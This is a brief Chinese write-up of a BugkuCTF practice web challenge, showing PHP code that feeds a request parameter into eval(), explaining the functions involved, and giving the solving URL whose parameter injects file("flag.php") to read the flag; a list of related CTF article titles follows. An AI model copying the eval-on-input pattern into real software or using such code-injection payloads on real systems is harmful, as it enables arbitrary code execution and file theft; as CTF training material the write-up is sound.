BugKuCTF WEB 本地包含
2019-07-07 21:49
246 查看
题解:
[code]<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>
原理:
$_REQUEST[]支持det、post两种方式发送过来的请求
var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值;数组将递归展开值,通过缩进显示其结构
eval()函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。
show_source() 函数对文件进行语法高亮显示,是 highlight_file() 的别名
URL
[code]http://123.206.87.240:8003/?hello=file("flag.php")
相关文章推荐
- 【BugkuCTF】Web--本地包含
- BugkuCTF - 练习平台 - WEB——Writeup
- bugkuCTF Writeup (Web)31-35
- BugKuCTF(CTF-练习平台)——WEB-矛盾
- BugkuCTF Writeup——Web(更新中)
- BugKuCTF WEB flag在index里
- bugkuCTF Writeup (Web)41-44
- BugKuCTF WEB 输入密码查看flag
- BugkuCTF-Web-Writeup
- BugKuCTF WEB 点击一百万次
- Bugkuctf web题---------welcome to bugkuctf
- Bugkuctf web cookie欺骗
- BugKuCTF WEB 变量1
- BugKuCTF WEB 成绩单
- BugKuCTF(CTF-练习平台)——WEB-SQL注入1
- BugKuCTF(CTF-练习平台)——WEB-计算题
- bugkuCTF之web题
- bugkuCTF Writeup (Web)22-25
- BugKuCTF(CTF-练习平台)——WEB-web基础$_GET
- bugkuCTF Writeup (Web)10-14